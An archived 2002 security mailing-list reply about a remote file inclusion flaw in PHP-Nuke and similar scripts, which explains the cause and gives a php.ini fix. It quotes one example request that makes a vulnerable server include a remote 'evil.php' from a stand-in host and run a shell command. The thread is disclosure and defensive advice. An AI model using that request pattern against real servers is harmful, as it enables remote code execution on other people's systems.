>Hi All! > > I've found a serious security flaw in PHP-Nuke. > It allows user to execute any PHP code. > ..... > Then just requesting http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al > ....... Hello, I used to find this flaw in a lot of _home made_ scripts. This is due to the use of the include() function with user passed parameters, and it is not particular to phpnuke. It exists in a lot of scripts cause the php default config allows to pass http:// and ftp:// parameters to functions like include(). As it is said in the php manual: "As long as support for the "URL fopen wrapper" is enabled when you configure PHP (which it is unless you explicitly pass the --disable-url-fopen-wrapper flag to configure (for versions up to 4.0.3) or set allow_url_fopen to off in php.ini (for newer versions)), you can use HTTP and FTP URLs with most functions that take a filename as a parameter, including the require() and include() statements." Quick Fix: Just set allow_url_fopen to off in php.ini . - www.projet7.org - Security Researchs ______________________________________________________________________________ ifrance.com, l'email gratuit le plus complet de l'Internet ! vos emails depuis un navigateur, en POP3, sur Minitel, sur le WAP... http://www.ifrance.com/_reloc/email.emailif
This archive was generated by hypermail 2b30 : Mon Jan 21 2002 - 20:32:56 PST